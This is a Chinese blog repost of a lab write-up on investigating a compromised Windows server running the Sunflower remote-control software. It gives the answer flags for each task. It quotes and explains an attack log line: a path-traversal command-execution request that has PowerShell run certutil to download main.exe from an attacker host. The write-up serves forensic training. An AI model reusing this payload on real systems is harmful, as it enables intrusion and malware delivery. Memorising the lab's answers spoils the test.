第四章 windows实战-向日葵

news/2025/10/22 16:04:44/文章来源:https://www.cnblogs.com/HalfwayMousie/p/19158251

第四章 windows实战-向日葵

1、通过本地 PC RDP到服务器并且找到黑客首次攻击成功的时间为 为多少,将黑客首次攻击成功的时间为 作为 FLAG 提交(2028-03-26 08:11:25.123);

翻阅日志的时候发现了在3月21日的时候黑客就已经开始发起进攻了但是一直没有成功

image-20251020165444537

直到在3月26日的时候黑客执行了ping命令和whoami的操作,这些操作是黑客首次上线会执行的操作之一确定自己是什么用户权限等

image-20251020170019750

flag{2024-03-26 10:16:25.585}

2、通过本地 PC RDP到服务器并且找到黑客攻击的 IP 为多少,将黑客攻击 IP 作为 FLAG 提交;

从上一题可以知道黑客连接的ip为

flag{192.168.31.45}

3、通过本地 PC RDP到服务器并且找到黑客托管恶意程序 IP 为,将黑客托管恶意程序 IP 作为 FLAG 提交;

继续翻阅日志在下面发现了一个exe执行程序

image-20251020170240608

[Acceptor][HTTP] new RC HTTP connection 192.168.31.45:49329, 
path: /check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+certutil+-urlcache+-split+-f+http%3A%2F%2F192.168.31.249%2Fmain.exe, 
version: HTTP/1.1

二、逐部分解析

关键字段 说明
192.168.31.45:49329 攻击者的来源IP和端口(客户端发起连接)
/check?cmd=... 访问的路径;?cmd= 表明目标Web服务可能有命令执行功能(例如一个远程控制或监控接口)
%2F URL编码的/,表示攻击者在尝试目录穿越(Path Traversal)../../../../ 让命令越过应用目录,进入系统路径。
windows/system32/WindowsPowerShell/v1.0/powershell.exe 攻击者调用系统的 PowerShell。说明服务程序已经执行了外部命令(RCE成立)。
certutil -urlcache -split -f http://192.168.31.249/main.exe 这是 下载恶意文件的命令:使用 Windows 内置的 certutil 工具下载远程木马 main.exe。这也是一个典型的“利用系统自带工具绕过防护”的方式。
192.168.31.249 被控机器要去下载的木马服务器(黑客控制端 IP)
plugin:check, session:sobGzXzWBfSlSbdqnmkUbJMLEjhssRx1 说明服务端接受了请求并分配了一个会话ID(session)。这意味着命令被正常解析执行。
flag{192.168.31.249}

4、找到黑客解密 DEC 文件,将黑客DEC 文件的 md5 作为 FLAG 提交;

继续翻阅日志在下面发现了一个qq号

image-20251020171256162

QQ搜索一下发现了一个群聊

image-20251020171343067

image-20251020171431231

image-20251020171611262

拿到密码题目要求我们进行md5加密

image-20251020171704546

flag{5ad8d202f80202f6d31e077fc9b0fc6b}

5、通过本地 PC RDP到服务器并且解密黑客勒索软件,将桌面加密文件中关键信息作为 FLAG 提交;

打开桌面上的 baoleiji.txt文件

image-20251020174020465

image-20251020174043752

和.DEC文件复制到一个txt里面

image-20251020174110900

拿去网站进行 rsa解密 https://try8.cn/tool/cipher/rsa

NXVJSTQUAPGTXKSX

image-20251020174605360

再拿去RSA解密

解密得到flag,iv偏移量是16个0;

image-20251020174645463

@suanve
时间是连续的,年份只是人类虚构出来用于统计的单位,2024年第一天和2023年最后一天,
不会有任何本质区别。你的花呗,你的客户,你的体检报告,窗外的寒风,都不会因为这是新的一年,
而停下对你的毒打。
GIVE YOU FLAG!!!!!
flag{EDISEC_15c2e33e-b93f-452c-9523-bbb9e2090cd1}

也是很励志了

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/943454.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

轻量服务器Lighthouse + 1Panel + Halo,三步打造你的专属网站

前言 在这个数字化浪潮席卷全球的时代,拥有一个属于自己的网站已经成为每个人、每个企业的标配。无论是个人博客记录生活点滴,还是企业官网展示品牌形象,抑或是社区平台汇聚志同道合的朋友,一个优秀的网站都能为你…

第四章 windows实战-emlog

第四章 windows实战-emlog 服务器场景操作系统 Windows 服务器账号密码 administrator xj@123456 题目来源公众号 知攻善防实验室 https://mp.weixin.qq.com/s/89IS3jPePjBHFKPXnGmKfA 任务环境说明注:样本请勿在本地…

Docling + LangChain + RAG 构建智能文档问答系统

构建智能文档问答系统:Docling + LangChain + RAG 完整实战指南 前言 在人工智能快速发展的今天,如何让AI更好地理解和处理复杂的文档内容成为了一个重要课题。本文将详细介绍如何结合Docling文档解析、LangChain框架…

企业公用电脑登录安全管控的终极方案:ASP操作系统安全登录管控方案 - 详解

企业公用电脑登录安全管控的终极方案:ASP操作系统安全登录管控方案 - 详解2025-10-22 15:58 tlnshuju 阅读(0) 评论(0) 收藏 举报pre { white-space: pre !important; word-wrap: normal !important; overflow-x:…

完整教程:【Linux】基础知识与操作汇总:一份给新手的 Linux 学习总结

完整教程:【Linux】基础知识与操作汇总:一份给新手的 Linux 学习总结pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: &…

第四章 windows实战-wordpress

第四章 windows实战-wordpress 1、请提交攻击者攻击成功的第一时间,格式:flag 我登录桌看到有小皮面板 然后我就去www目录下面查看apache日志了但是这个日志里面没有内容 随后在nginx。log上查看后发现了日志记录 一…

2025 年固化剂生产厂家最新推荐排行榜:聚焦国内优质厂商,助力选购高性价比混凝土及厂房用固化剂

引言 随着固化剂在混凝土处理、厂房地坪维护等领域的应用愈发广泛,市场需求持续攀升,但随之而来的是厂商数量激增、产品质量良莠不齐的乱象。许多采购商在选择时面临诸多难题:部分产品性能不稳定,易出现地坪起砂、…

2025 年锂基固化剂生产厂家最新推荐榜单:聚焦优质企业,助力客户精准选品,解决行业选品难题锂基密封/锂基混凝土/厂房锂基固化剂公司推荐

引言 当前锂基固化剂市场需求日益增长,但行业乱象却让客户选品举步维艰。部分厂家缺乏核心技术,产品性能不达标,易出现地坪起砂、开裂等问题;售后体系缺失,客户遇到问题投诉无门;还有不少无资质厂家浑水摸鱼,导…

广义串并联图

广义串并联图 参考资料 https://www.luogu.com.cn/article/llclwny8本文来自博客园,作者:wing_heart,转载请注明原文链接:https://www.cnblogs.com/wingheart/p/19158238

详细介绍:【超全】基于Springboot的海鲜销售管理系统【包括源码+文档+调试】

pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: "Consolas", "Monaco", "Courier New", …

完整教程:PostgreSQL 中序列(Sequence)的详细用法

完整教程:PostgreSQL 中序列(Sequence)的详细用法pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: "Consolas&quo…

第八章 内存马分析-java02-shiro

第八章 内存马分析-java02-shiro 1.将 shiro 的 key 作为 flag 提交 在上个靶场已经找到了shiro的key,flag{KduO0i+zUIMcNNJnsZwU9Q==} 2.隐藏用户后删除,并将隐藏用户名作为 flag 提交 这里提示我们要渗透进入,先使…

第八章 内存马分析-java01-nacos

第八章 内存马分析-java01-nacos 1、nacos 用户密码的密文值作为 flag 提交 flag 启动 /var/local/下的 autorun.sh即可正常启动在/var/local/nacos/conf 有个nacos-mysql.sql文件 我们使用 strings nacos-mysql.sql |…

2025 种植棚/养殖棚/工程/羊肚菌/保温/园林/加厚/绿化/草苫子推荐榜:济宁泽萌草制品 5 星领跑,适配大棚 / 混凝土 / 园艺多场景需求

随着农业种植、建筑养护、园艺培育对 “保温保湿、成本经济、环保可降解” 需求升级,草苫子凭借天然材质与实用性能,成为多场景优选覆盖材料。结合材质品质、耐用性、场景适配度与用户反馈,2025 年草苫子推荐榜发布…

2025 餐饮/电商/品牌策划优选榜:上海物心 5 星领跑,细分领域这些适配型企业值得 pick

在消费市场同质化加剧的 2025 年,精准的品牌策划成为企业破圈的核心抓手。这份结合服务适配度、落地成效与用户口碑的推荐榜中,上海物心品牌策划有限公司以全维度实力稳居 5 星,另有多家细分领域标杆企业表现亮眼。…

2025 灌装/大桶/桶装/纯净/瓶装/水设备精选推荐榜:路得自动化领衔,这些靠谱品牌值得关注

在水设备需求持续增长的市场中,优质设备是保障用水效率与品质的核心。这份 2025 水设备推荐榜聚焦专业实力与用户口碑,为选型提供参考,其中青州市路得自动化设备有限公司稳居榜首。 青州市路得自动化设备有限公司 ★…

2025 打捆机捆/包装/绕树干/草绳推荐榜:济宁泽萌草制品 5 星领跑,适配农业 / 园艺 / 建筑 / 物流捆扎需求

随着农业收割捆扎、园艺植物固定、建筑防护包裹、物流缓冲填充对 “天然环保、抗拉耐用、成本经济” 需求升级,草绳凭借天然材质与实用性能,成为多场景核心辅助材料。结合材质品质、抗拉强度、场景适配度与用户反馈,…

AI不是魔法,而是算力+算法+数据的平衡艺术!

过去几年,“人工智能”几乎成了最热门的科技词汇。从ChatGPT的惊艳亮相,到各种AI绘画、语音、自动驾驶的突破,人们似乎越来越相信:AI就是一种“魔法”——它能自动学习、自动思考,甚至自动决策。 但事实远没有那么…

雪碧图动画实例 - 教程

雪碧图动画实例 - 教程2025-10-22 15:45 tlnshuju 阅读(0) 评论(0) 收藏 举报pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font…

遇到一例无法保存编辑后的 Excel 文件的问题

某个 .xlsx 文件编辑后按 ctrl + s 保存,存在如下提示—— 保存“C:\Users\demo\Downloads\工作簿1.xlsx”时检测到错误。Microsoft Excel 可通过删除或修复某些功能来保存此文件。若要在新文件中进行修复,请单击“继…